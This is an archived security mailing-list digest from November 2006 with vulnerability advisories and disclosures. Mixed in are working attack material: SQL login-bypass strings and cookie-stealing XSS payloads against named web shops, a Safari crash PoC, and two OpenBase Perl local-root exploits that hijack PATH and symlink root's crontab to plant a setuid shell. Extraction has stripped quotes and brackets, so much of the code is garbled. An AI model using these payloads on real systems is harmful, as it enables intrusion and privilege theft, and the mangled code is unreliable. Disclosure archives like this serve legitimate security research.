Real Estate Listing System SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory : Estate Listing 
#Software: Real Estate Listing System
#Method : Sql Injection

[SECURITY] [DSA 1210-1] New Mozilla Firefox packages fix several vulnerabilities

2006-11-14 Thread Martin Schulze
Hash: SHA1

- --
Debian Security Advisory DSA 1210-1[EMAIL PROTECTED] Martin Schulze
November 14th, 2006
- --

Package: mozilla-firefox
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-2788 CVE-2006-4340 CVE-2006-4565 CVE-2006-4566
 CVE-2006-4568 CVE-2006-4571
BugTraq ID : 20042

Several security related problems have been discovered in Mozilla and
derived products such as Mozilla Firefox.  The Common
Vulnerabilities and Exposures project identifies the following


Fernando Ribeiro discovered that a vulnerability in the getRawDER
functionallows remote attackers to cause a denial of service
(hang) and possibly execute arbitrary code.


Daniel Bleichenbacher recently described an implementation error
in RSA signature verification that cause the application to
incorrectly trust SSL certificates.

CVE-2006-4565, CVE-2006-4566

Priit Laes reported that that a JavaScript regular expression can
trigger a heap-based buffer overflow which allows remote attackers
to cause a denial of service and possibly execute arbitrary code.


A vulnerability has been discovered that allows remote attackers
to bypass the security model and inject content into the sub-frame
of another site.


Multiple unspecified vulnerabilities in Firefox, Thunderbird and
SeaMonkey allow remote attackers to cause a denial of service,
corrupt memory, and possibly execute arbitrary code.

For the stable distribution (sarge) these problems have been fixed in
version 1.0.4-2sarge12.

For the unstable distribution (sid) these problems have been fixed in
version 1.5.dfsg+ of firefox.

We recommend that you upgrade your Mozilla Firefox package.

Upgrade Instructions

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge

  Source archives:
  Size/MD5 checksum: 1003 751f0df80be8491ac3b24e902da6e3cb
  Size/MD5 checksum:   441420 8b1078ef98ff79137869c932999d3957
  Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d

  Alpha architecture:
  Size/MD5 checksum: 11181154 771ba85fbf21e6419d87820fc6f19a9a
  Size/MD5 checksum:   170352 f2c75d2fb5ab8684a20ba6fc08585cdb
  Size/MD5 checksum:62166 79fd193ea817fc1f466a57e4a37d74fa

  AMD64 architecture:
  Size/MD5 checksum:  9411492 3c3704ef1014e0d9dc38ece9d16a36d4
  Size/MD5 checksum:   165132 54e7468747e04dc1449faa8ff9c123b4
  Size/MD5 checksum:60700 a8ac42c24a29be9b260a0ec426b83f1c

  ARM architecture:
  Size/MD5 checksum:  8232340 0d9f98d7a3bc7bcef0d759b98061c79b
  Size/MD5 checksum:   156586 7b74819b6afa58f7c485fb581ace3501
  Size/MD5 checksum:55998 08e378fe351fc437422ea242ff83a60c

  HP Precision 

ASPintranet SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory :
#Software: ASPintranet
#Method : Sql Injection

SiteXpress SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory 
#www.Aria-security.Com For English For Persian 
#Original Advisory :
#Software: SiteXpress E-Commerce System
#Method : SQL Injection

WWWeb Cocepts SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory : Cocepts.txt
#Software: WWWeb Cocepts
#Method : Sql Injection

Ustore SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory :
#Software: UStore | E-Commerce in 15-Minutes
#Method : Sql Injection

eShopping SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory :
#Software: E Commerce Store Shop Builder
#Method : SQL Injection
#http://target/path/categories.asp?id=[SQL INJECTION]

ECommerce Store Shop Builder

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory :
#Software: eShopping Cart
#Method : SQL Injection
#http://target/productdetail.asp?ProductID=[SQL CODE]
#http://target/products.asp?categoryid=[SQL CODE]

Engine Manager SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory : Manager.txt
#Software: Engine Manager 
#Method: SQL Injection
#http://target/[path]index.asp?mid=[SQL Injection]

BPG Content Management System SQL Injection

2006-11-14 Thread Advisory
#Aria-Security Team Advisory
#www.Aria-security.Com For English For Persian 
#Original Advisory :
#Software: BPG Content Management System
#Method: SQL Injection
#http://target/[path]/publication_view.asp?InfoID=[SQL CODE]
#http://target/[path]/publications_list.asp?vjob=[SQL Injection]

Advisory 14/2006: Dotdeb PHP Email Header Injection Vulnerability

2006-11-14 Thread Stefan Esser
Hash: SHA1

Hardened-PHP Project

  -= Security  Advisory =-

 Advisory: Dotdeb PHP Email Header Injection Vulnerability
 Release Date: 2006/11/14
Last Modified: 2006/11/14
   Author: Stefan Esser [EMAIL PROTECTED]

  Application: Dotdeb PHP  5.2.0 Rev 3
 Severity: Calling PHP scripts with special crafted URLs
   can result in arbitrary email header injection
 Risk: Critical
Vendor Status: Vendor has fixed this with Dotdeb PHP 5.2.0 rev 3


   Quote from
   Dotdeb is an unofficial repository containing many packages 
for the Debian stable (aka .Sarge.) distribution :   
 * PHP, versions 4  5,
 * MySQL,versions 4.1  5.0,
 * Qmail,
 * Vpopmail...
Its goal is to turn easily your Debian GNU/Linux boxes into 
powerful, stable and up-to-date LAMP servers.

   It was discovered that the Dotdeb PHP packages are patched with
   a mail() protection patch that was originally created by Steve
   Bennett and is nowadays developed at This patch adds
   an X-PHP-Script header to outgoing mails that contains the name
   of the server, the script and the calling IP.
   Unfortunately the script name is directly copied from PHP's
   PHP_SELF variable without further processing. Because PHP_SELF
   does not only contain the script name but also the urldecoded
   content of PATH_INFO this allows injection of arbitrary content
   into the email headers.
   Because of this vulnerability on every PHP server that uses this
   patch every PHP script that uses the mail() function can be used
   to send either spam mail or tricked into disclosing sensitive 
   content by injecting Bcc: headers.
   A possible attack could be injecting Bcc: headers into password 
   reminder/password reset mails sent out by forums to break into
   the administrator account.

Proof of Concept:

   The Hardened-PHP Project is not going to release a proof of concept 
   exploit for this vulnerability.

Disclosure Timeline:

   10. November 2006 - Notified dotdeb vendor and
   12. November 2006 - released updated patch
   13. November 2006 - dotdeb released updated PHP packages
   14. November 2006 - Public Disclosure


   We strongly recommend upgrading your dotdeb installation as soon
   as possible, because it not only fixes this vulnerability but
   also bundles our Suhosin Patch for extra protection of your PHP
   You can get the packages from:   

   If you want more information about the Suhosin Patch then go to:


   pub  1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key
   Key fingerprint = 066F A6D0 E57E 9936 9082  7E52 4439 14CC 0A86 4AA1

Copyright 2006 Stefan Esser. All rights reserved.

Version: GnuPG v1.4.3 (GNU/Linux)


Apple Safari match Buffer Overflow Vulnerability

2006-11-14 Thread jbh_cg
The following bug was tested on the latest version of Safari on a fully-patched 
Mac OS X 10.4. 

A remote attacker may exploit this issue to crash the application, effectively 
denying service to legitimate users. Successful exploitation could lead to 
remote code execution.

var reg = /(.)*/;
var z = 'Z';
while (z.length = 8192) z+=z;
var boum = reg.exec(z);   

Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability

2006-11-14 Thread Nick FitzGerald
Raphael Marichez to Nick Boyce (??):

  um ... doesn't that make it a *remote* privilege escalation ?
 in a certain way... you're right... although that requires the user
 complicity, strictly speaking, you're right.

Makes it no less remote.

Not _automatic_ remote, but still very, very much remote.

 The guy who would manage to remotely root a box with that vulnerability would
 be really good. The real serious risk is local only. (think about all
 that unpatched linux boxes in the universities...)

You have a really odd view of the security exposure...

Even _Microsoft_ (now) self-rates this type of vulnerability as 
critical and remotely exploitable for execution of arbitrary code (e.g. 
the WMF vuln from late last year).  OK -- so we can quibble over 
whether it released patches quickly enough in that case (no), but at 
least even the traditionally considered slackest of security slackers 
gets the rating of the severity and scope of this kind of vuln right.

Any hope of Linux distro folk getting that clued?


Nick FitzGerald

Re: [ GLSA 200611-03 ] NVIDIA binary graphics driver: Privilege escalation vulnerability

2006-11-14 Thread Glynn Clements

Nick Boyce wrote:

 On 11/7/06, Raphael Marichez [EMAIL PROTECTED] wrote:
  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Gentoo Linux Security Advisory   GLSA 200611-03
  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
   Title: NVIDIA binary graphics driver: Privilege escalation
Date: November 07, 2006
Bugs: #151635
  ID: 200611-03
  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  The NVIDIA binary graphics driver is vulnerable to a local privilege
  An X client could trigger the buffer overflow with a maliciously
  crafted series of glyphs. A remote attacker could also entice a user to
  open a specially crafted web page, document or X client that will
  trigger the buffer overflow.
 um ... doesn't that make it a *remote* privilege escalation ?

Well, any file parsing bug could be considered a remote
vulnerability if you consider the prospect of downloading a malicious
file from the internet.

I don't think that remote X clients are an issue; the last time I
checked, the driver in question was only used for direct rendering,
which requires a local X client, while indirect rendering uses the
built-in software renderer.

Glynn Clements [EMAIL PROTECTED]

Inventory Manager [injection sql xss (get)]

2006-11-14 Thread saps . audit
vendor site:
product:Inventory Manager
bug:injection sql  xss (get)

injection sql :'[sql][inventory]picfield=[sql][inventory]picfield=photowhere='[sql]

xss get :'scriptalert(document.cookie)/script

laurent gaffié  benjamin mossé

Evolve Merchant[ injection sql ]

2006-11-14 Thread saps . audit
vendor site:
product:Evolve Merchant
bug:injection sql

injection sql (get) :'[sql]

laurent gaffié  benjamin mossé

Car Site Manager [injection sql xss (get)]

2006-11-14 Thread saps . audit
Car Site Manager [injection sql  xss (get)]
vendor site:
product:Car Site Manager
bug:injection sql

injection sql :'[sql]'[sql]'[sql]'[sql]

xss (get):'scriptalert(document.cookie)/script

laurent gaffié  benjamin mossé

Re: New Bug MiniBB Forum = 2 Remote File Include (index.php)

2006-11-14 Thread navairum
This is bogus, about 5-10 lines above it includes a file which declares 

include ('./setup_options.php');

if(!isset($startIndex)) $startIndex=$indexphp;
if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';


if(!isset($manualIndex)) $manualIndex=$indexphp.'action=manual';
if(isset($mod_rewrite) and $mod_rewrite) 
$queryStr=str_replace(array('%3D0%26mdrw%3Don', 'amp;mdrw=on'), '', $queryStr);

if($useSessions) { 
if($sessname=='') $sessname='PHPSESSID';
if(!isset($$sessname)) { $indexphp.=SID.''; $bb_admin.=SID.''; } else { 
$bb_admin.={$sessname}=.$$sessname.''; }

include ($pathToFiles.'setup_'.$DB.'.php');
include ($pathToFiles.'bb_cookie.php');
include ($pathToFiles.'bb_functions.php');
include ($pathToFiles.'bb_specials.php');

FunkyASP Glossary v1.0 [injection sql]

2006-11-14 Thread saps . audit
vendor site:
product:FunkyASP Glossary v1.0
bug:injection sql

injection sql :'[sql]

laurent gaffié  benjamin mossé

Blogme v3 [admin login bypass xss (post)]

2006-11-14 Thread saps . audit
vendor site:
product:Blogme v3
bug:login bypass  xss (post)

admin login bypass :
user : ' or '1' = '1
passwd:  1'='1' ro '

xss post :
in: /comments.asp?blog=85  
vulnerables fields:
- Name 
- Comments

laurent gaffié  benjamin mossé

Property Site Manager [login bypass ,multiples injection sql xss (get)]

2006-11-14 Thread saps . audit
vendor site:
product:Property Site Manager
bug:injection sql ,login bypass , xss 

login bypass :
just login with :
user: 'or''='
passwd: 'or''='

injection sql :'[sql]'[sql]'[sql]'[sql]

xss (get):'scriptalert(document.cookie)/script

laurent gaffié  benjamin mossé

[Fwd: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit']

2006-11-14 Thread K F (lists)

I think the list spam trap ate this message a few weeks ago.
This was supposed to go out on Halloween but it didn't... but either way 
all you Mac users can get scared or something. OOGA BOOGA!

Description: GNU Zip compressed data
DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Product: 'Intego VirusBarrier X4 = VirusBarrierX47070.dmg'

Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security 
solution for Macintosh computers, by Intego, the 
leading publisher of personal security software for Macintosh. It offers 
thorough protection against viruses of all types, coming 
from infected files or applications, whether on CD-ROMs, DVDs or other 
removable media, or on files downloaded over the Internet 
or other types of networks.

Intego VirusBarrier X4 protects your computer from viruses by constantly 
examining all the files that your computer opens and 
writes, as well as watching for suspicious activity that may be the sign of 
viruses acting on applications or other files. With 
Intego VirusBarrier X4 on your computer, you can rest assured that your 
Macintosh has the best protection available against 
viruses of all kinds.

Although VirusBarrier does a pretty good job of halting malicous activity the 
product currently suffers from a flaw related to the 
amount of alerts that it can process simultaneously. If an attacker is able to 
trigger multiple alerts in succession within a very 
short amount of time he or she may be able cause VirusBarrier to completely 
ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further 
spreading of malware.

As an example we will show how VirusBarrier normally stops a local root exploit 
with behavior similar to 'OSX.ExploitMachex.A', then 
we will demonstrate how the VirusBarrier protection can be bypassed by using a 
simple flood of Eicar Test files. 

Any typical attempt to access or execute a file or program that is a match for 
a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that 
slowly empties as the virus nears eradication. 

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do 
('Ignore' || 'Repair')? 

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus 
program existed at all. 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 

On the other hand if you chose 'Repair' the process is terminated dead in its 
tracks and the file is nulled out: 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit 
-rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under 
normal circumstances this would be adequate to stop a 
malicious attack. 

If however an attacker floods the file system with dummy virus files at a quick 
rate the VirusBarrier software will promptly stop 
responding after presenting the user with a few audible and visual alerts. 
After about 40 some odd infected files in a row the 
system will become confused and in some cases VirusBarrier may stop responding 
completely. (Intego confirmed a limit of 20 files)

When under attack the user may see dozens of messages on the screen. With our 
example code the messages are similar to the following: 

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

From the attackers standpoint the exploitation is fairly quick and simple. Our 
example uses a local root exploit however this tactic
could easily be applied to any existing malware technique that Intego 
VirusBarrier protects against. Code could in theory be run as a 
precurser to an InqTana attack as a means to bypass the Intego protection. The 
existing signatures for InqTana A B C and D would 
then be completely useless and an E variant would be born. 

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls  README.txt  pwntego.uu
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./ 
rm: /tmp/objc_sharing_ppc_92: Permission denied
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) 

Re: [Full-disclosure] ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

2006-11-14 Thread Micheal Turner
7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC

Sub WZFILEVIEW_OnAfterItemAdd(Item)
end sub

-- prdelka

All new Yahoo! Mail The new Interface is stunning in its simplicity and ease 
of use. - PC Magazine

[Fwd: OpenBase SQL multiple vulnerabilities Part Deux]

2006-11-14 Thread K F (lists)

I think the list spam trap ate this message a few weeks ago.

# written by kf (kf_lists[at]digitalmunition[dot]com) 
# = (vulnerable) ?
# This is some fairly blatant and retarded use of system()
# cd cp chmod chown rm mkdir and killall appear as strings in the binary hrmm 
can you cay system() ! 
# -restart -MachLaunch -launch -noexit -install_plugins -kill -install 
-uninstall and -deactivate all 
# *may* be used to trigger these issues.
# I don't feel like seeing which flags call which binaries... just 3 is plenty 
to prove the point.  
# Tested against OpenBase10.0.0_MacOSX.dmg
$binpath = /Library/OpenBase/bin/openexec; # Typical location. 

$tgts{0} = cp:$binpath -install;
$tgts{1} = killall:$binpath -kill;
$tgts{2} = rm:$binpath -uninstall;

unless (($target) = @ARGV) {
print \n\nUsage: $0 target \n\nTargets:\n\n;

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{$key});
print \t$key . $a - $b\n;

print \n;
exit 1;

$ret = pack(l, ($retval));
($a,$b) = split(/\:/,$tgts{$target});
print *** Target: $a - $b\n;

printf OP main()\n; 
printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\chown root: 
/tmp/pwns ; chmod 4775 /tmp/pwns\); }\n;

printf OP main()\n; 
printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\/bin/sh 
-i\); }\n;

system(gcc -o /tmp/finisterre /tmp/finisterre.c); 
system(gcc -o /tmp/pwns /tmp/pwns.c); 

system(echo /bin/cp /tmp/finisterre /tmp/$a);
system(/bin/cp /tmp/finisterre /tmp/$a);

system(export PATH=/tmp:\$PATH; $b);

# written by kf (kf_lists[at]digitalmunition[dot]com) 
# = (vulnerable) ?
# Create a new file anywhere on the filesystem with rw-rw-rw privs. 
# Sorry you can NOT overwrite existing files. 
# Writing to roots crontab seems to be fairly prompt at handing out root shells
# Make sure that you get cron running by first creating a user crontab!
# The openexec binary creates a root owned log file in /tmp/ 
# Following symlinks is bad mmkay!
# Tested against  OpenBase10.0.0_MacOSX.dmg

$dest = /var/cron/tabs/root;

$binpath = /Library/OpenBase/bin/openexec; # Typical location. 

# In this instance targets are really pointless but I wanted to archive known 
vulnerable versions while testing. 
$tgts{0} = OpenBase10.0.0_MacOSX.dmg:$binpath;

unless (($target) = @ARGV) {
print \n\nUsage: $0 target \n\nTargets:\n\n;

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{$key});
print \t$key . $a\n;

print \n;
exit 1;

$ret = pack(l, ($retval));
($a,$b) = split(/\:/,$tgts{$target});
print *** Target: $a $b\n;

printf OP main()\n; 
printf OP { seteuid(0); setegid(0); setuid(0); setgid(0); system(\/bin/sh 
-i\); }\n;
system(gcc -o /Users/Shared/shX /tmp/finisterre.c); 

# Create a user crontab FIRST! This ensures that cron is running when the fake 
root crontab is created. Aka semi-insta-root (in a minute)
system(echo '* * * * * /usr/bin/id  /tmp/aa'  /tmp/user_cron);
system(crontab /tmp/user_cron);

# The umask is where the lovin occurs. I'm rw-rw-rw James bitch!!
system(ln -s $dest /tmp/output);
sleep 60;   # Probably don't need to wait this long but whatever... 

system(umask 111; $b -deactivate);
print $dest should be rw-rw-rw ... enjoy!\n;
print installing trojan crontab for root\n;

system(echo '* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 
4755 /Users/Shared/shX'  /var/cron/tabs/root);

print sit around and chill for a minute then check /Users/Shared/shX !\n;
sleep 60 ;


DMA[2006-1107a] - 'OpenBase SQL multiple vulnerabilities Part Deux'
Author: Kevin Finisterre
Product: 'OpenBase SQL =10.0 (?)'

(regurgitation warning - this may taste VERY familiar)

For over a decade, the OpenBase family of products have been enabling some of 
the most innovative business applications 
at work today. With thousands of customers worldwide, OpenBase has become a 
brand that companies can rely on. OpenBase 
customers include ATT, Adobe Systems, Canon, Walt Disney, First National Bank 
of Chicago, MCI, Motorola, Apple, The 
Sharper Image and many other innovators worldwide. 

As mentioned previously several setuid root binaries from OpenBase SQL are 
placed in /Library/OpenBase/bin during the 
installation of WebObjects support for Xcode or during a standard OpenBase 
install. In this particular instance we will
be dealing only with the openexec binary. 

pwnercycles-ibook:/tmp pwnercycle$ ls -al 

EEYE: Workstation Service NetpManageIPCConnect Buffer Overflow

2006-11-14 Thread eEye Advisories
eEye Research -

Workstation Service NetpManageIPCConnect Buffer Overflow

Release Date:
November 14, 2006

Date Reported:
July 25, 2006

High (Remote Code Execution)


Systems Affected:
Windows 2000 (Remote Code Execution)
Windows XP SP1 (Local Privilege Escalation)

A flaw exists in a default Windows component called the Workstation
Service that when exploited allows for remote code execution in SYSTEM
context, allowing an attacker to take complete control of affected

Technical Details:
In the Workstation Service module called wkssvc.dll, the
NetpManageIPCConnect function has a call to swprintf with an unchecked
buffer. The input buffer is controllable by the remote attacker.

.text:76781D67 mov edi, [ebp+arg_0]
.text:76781D90 lea eax, [ebp+var_2CC]
.text:76781DA0 pushedi
.text:76781DA1 pushoffset %ws\\IPC$
.text:76781DA6 pusheax
.text:76781DA7 callds:swprintf

This function is called by NetpJoinDomain, which is eventually called by
the NetrJoinDomain2 function, which is exposed through RPC.

The IDL for NetrJoinDomain2 looks like this:
[in][unique][string] wchar_t * arg_1,
[in][string] wchar_t * arg_2, 
[in][unique][string] wchar_t * arg_3,
[in][unique][string] wchar_t * arg_4,
[in][unique] struct_C * arg_5,
[in] long arg_6

arg_2 will contain string with format like Domain name+\+Hostname.

Hostname will be passed as NetpManageIPCConnect's first argument. The
variable is under the attacker's control and is passed to swprintf,
which causes a stack-based buffer overflow.

For this vulnerable code to be reached, we must provide a valid and live
Domain name as a part of the string. We can set up a fake domain
server anywhere reachable from the vulnerable machine on the Internet.

P.S. If you despise Birkenstocks, are not afraid of your Tequila, and
are well versed in reverse engineering, bug finding, or are looking to
learn, we are hiring both junior and senior security researchers. Send
your resume (blathering of college course work, degrees, and past
experience we don't care about) or more importantly a description of why
you would be a good researcher to [EMAIL PROTECTED]

Discovery: JeongWook Matt Oh
Additional Research: Derek Soeder

Related Links:
Retina Network Security Scanner - Free Trial
Blink Endpoint Vulnerability Prevention - Free Trial

Dugsong, Ohhara, Ryan Lee, Pilot, Sakai, Gonan and all the Korean
Bugtruck Mailing List Subscribers

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
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user's own risk.

ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

2006-11-14 Thread zdi-disclosures
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure
November 14, 2006

-- CVE ID:

-- Affected Vendor:

-- Affected Products:
WinZip 10.0 (pre build 7245)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since September  5, 2006 by Digital Vaccine protection
filter ID 4671. For further product information on the TippingPoint IPS: 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
systems with vulnerable installations of WinZip. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists within the ActiveX control


A re-branded version of the FileView ActiveX control developed by Sky
Software. The object is marked Safe for Scripting and exposes several
unsafe methods which can be leveraged to result in arbitrary code
execution with no further interaction.

-- Vendor Response:
WinZip has issued build 7245 to correct this vulnerability. More details
can be found at:

-- Disclosure Timeline:
2006.08.28 - Vulnerability reported to vendor
2006.09.05 - Digital Vaccine released to TippingPoint customers
2006.11.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability

2006-11-14 Thread zdi-disclosures
ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory
Corruption Vulnerability
November 14, 2006

-- CVE ID:

-- Affected Vendor:

-- Affected Products:
Internet Explorer 6

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since October 10, 2006 by Digital Vaccine protection
filter ID 4761. For further product information on the TippingPoint IPS: 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious page.

The specific vulnerability exists due to improper parsing of HTML CSS
'float' properties. By ordering specially crafted 'div' tags in a web
page, memory corruption can occur leading to remote code execution.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

-- Disclosure Timeline:
2006.07.18 - Vulnerability reported to vendor
2006.10.10 - Digital Vaccine released to TippingPoint customers
2006.11.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Sam Thomas.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

A+ Store E-Commerce[ injection sql xss (post) ]

2006-11-14 Thread saps . audit
vendor site:
product:A+ Store E-Commerce
bug:injection sql  xss post

injection sql (get) :'[sql]

xss post :
in /account_login.asp:
username = 
passwd = 

laurent gaffié  benjamin mossé

A-Cart pro[ injection sql (postget)]

2006-11-14 Thread saps . audit
vendor site:
product:A-Cart pro
bug:injection sql

injection sql (get) :

injection sql (post) :
( or just post your query in the search engine ... )

laurent gaffié  benjamin mossé

hpecs shopping cart[login bypass injection sql (post)]

2006-11-14 Thread saps . audit
vendor site:
product:hpecs shopping cart
bug:injection sql

login bypass :
username: 'or''='
passwd:   'or''='

injection sql (post) :
 ( or just post your query in the search engine ... )

laurent gaffié  benjamin mossé